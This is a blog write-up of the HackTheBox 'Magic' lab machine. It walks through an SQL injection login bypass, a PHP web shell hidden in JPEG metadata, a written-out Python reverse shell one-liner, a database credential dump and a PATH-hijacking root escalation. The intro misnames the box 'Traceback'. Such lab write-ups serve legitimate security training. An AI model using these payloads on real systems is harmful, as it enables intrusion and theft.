HackTheBox — Magic

Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.

1. Magic Info Card

Summary

To gain a foothold we bypass the web app authentication using SQLi and then upload a malicious JPG file to achieve code execution, which lets us get a reverse shell. Enumerating the local web directory we find database credentials for the user ‘theseus’, which allows us to dump the DB which contains theseus’ user account password. Finally, to get root we perform a PATH hijacking exploit on a custom ‘sysinfo’ SUID-enabled binary.

1. Enumeration and Initial Foothold (www-data)

I began my enumeration by running an Nmap scan.

# Nmap 7.80 scan initiated as: nmap -sV -sC 10.10.10.185

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only SSH and HTTP open, so let’s focus on the web app. Opening up Firefox we can see the web app, which is heavily image-based, along with a login option in the bottom left.

2. Magic Web Application
3. Login Form

Before diving into the login form, I ran some directory enumeration with wfuzz. This found the URL path (below) where all the images are located on the server.

4. Wfuzz Scan
http://10.10.10.185/images/uploads/<file_name>.jpg

SQl Injection (SQLi) Authentication Bypass: Now enumerating the login, I tried some default credentials but these didn’t work. However, when inserting a single ' I didn't get the same error message, hinting at some possible SQLi. Opening up BurpSuite to capture the request and using a basic SQLi authentication bypass payload, we get redirected to the upload form.

5. SQl Injection Authentication Bypass

Malicious Image Upload → RCE: Pressing upload with no attachment shows us the permitted file types, namely: JPG, JPEG and PNG.

6. File Upload Restrictions

We can manipulate an image’s exif data and embed PHP code using ‘Exiftool’ with the code below, which if successful will let us run system commands on the server from the browser URL by appending ?cmd=<command> to our image file.

exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' <file_name>.jpg

For this I downloaded a random jpg file and named it run.jpg, embedded the malicious PHP code from above, and then renamed it run.php.jpg for it to be able to bypass the upload filter.

7. Embedding Malicious PHP Code into a JPEG.

After uploading it through the web app, going to the URL where images are located (see above), we can confirm we have remote code execution.

8. Code Execution

Swapping the command ‘ls -la’ for a python3 reverse shell, we have our foothold as www-data!

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.13",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
9. Initial Foothold

2. User Shell

As mentioned in previous writeups, if I get a foothold as www-data I always enumerate the web directories for database files or other files that may contain credentials.

User Credentials via Magic DB Dump: This proved to be a good strategy as in the /var/www/Magic/ directory there was a database config file ‘db.php5’, which contains database credentials.

10. Database Credentials

‘theseus’ is also a user on this box but trying these credentials to login fails. Perhaps we can extract details surrounding the Magic database with these credentials? Luckily the tool ‘mysqldump’ is installed on the box and we can use this.

:/var/www/Magic$ mysqldump -u theseus -p iamkingtheseus Magic
11. Shortened Version of DB Dump.

Awesome! Some more credentials for ‘theseus’, maybe this time we can log in?

12. User Shell and Flag

And we get user.txt, on to root!

3. Root

Moving LinPeas.sh over to the box and running it revealed a non-standard SUID binary, called ‘sysinfo’. Running this binary we can see gives us, as expected, various system information (cut down).

13. Custom Sysinfo Binary.

The ‘sysinfo’ binary outputs system information using four main binary calls. The information and corresponding command to achieve such information are:

  • Hardware Info = lshw -short
  • Disk Info = fdisk -l
  • CPU Info = cat /proc/cpuinfo
  • MEM Usage = free -h

This can be seen by analyzing the binary with the ‘strings’ tool (excluding any files beginning with _ for readability).

14. Sysinfo Vulnerability — Relative Path Syscalls

Path Hijacking Privilege Escalation: As we can see, the calls to these binaries are relative and therefore we can perform a PATH hijacking exploit. That is, we can make the ‘sysinfo’ binary point to our created malicious file during execution rather than the actual intended binaries. This is well explained in Raj Chandel’s blog post.

Additionally, I’ve recently completed a really cool TryHackMe Room dedicated to PATH hijacking exploits so be sure to check that out!

Since the ‘sysinfo’ binary has an SUID bit set it will execute as root and therefore if our malicious file contains reverse shell code, we will get a shell as root! The full exploit is explained and then shown below.

1 | touch /tmp/lshw : Creating our malicious file with the same name as the intended 'lshw' binary in the /tmp directory.2 | nano lshw : Using nano to insert Python3 reverse shell code.3 | cat lshw : Confirming our reverse shell code was correct.4 | chmod 755 lshw : Giving our malicious file read and execute permissions.5 | export PATH=/tmp:$PATH : Altering the $PATH variable to point to our malicious 'lshw' in the /tmp directory.6 | nc -lvnp 9999: Opening a netcat listener on port 9999 in a new (local) terminal.7 | sysinfo : executing the SUID binary and catching the connection.

Executing this will a netcat listener open on the correct port gives us a root shell and the root flag!

15. Root Shell and Root Flag.

Conclusion

Thanks for reading and keep an eye out for future writeups! Feedback is always welcome through, and my HackTheBox profile is linked below :)

--

--

--

MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Ruutu Plus (Finland) ⋆ 06 Months Warranty

Gronda Pro ⋆ 06 Months Warranty

{UPDATE} Word Spelling Search Hack Free Resources Generator

The Ubiq DEX — Using Sparrow

(KAVA) DOT launch Coinbase Pro now

Popsicle Finance Exploit: How The Hacker Did It

Streamline and Scale Your Enterprise SOC with Automation and Collaboration

How to brainstorm security controls

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jack Roberts

Jack Roberts

MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.

More from Medium

Gunship (easy) -HTB Writeup

Inclusion CTF Walkthrough — TryHackMe

TryHackMe — Jeff

Compromisso HackTheBox Ctf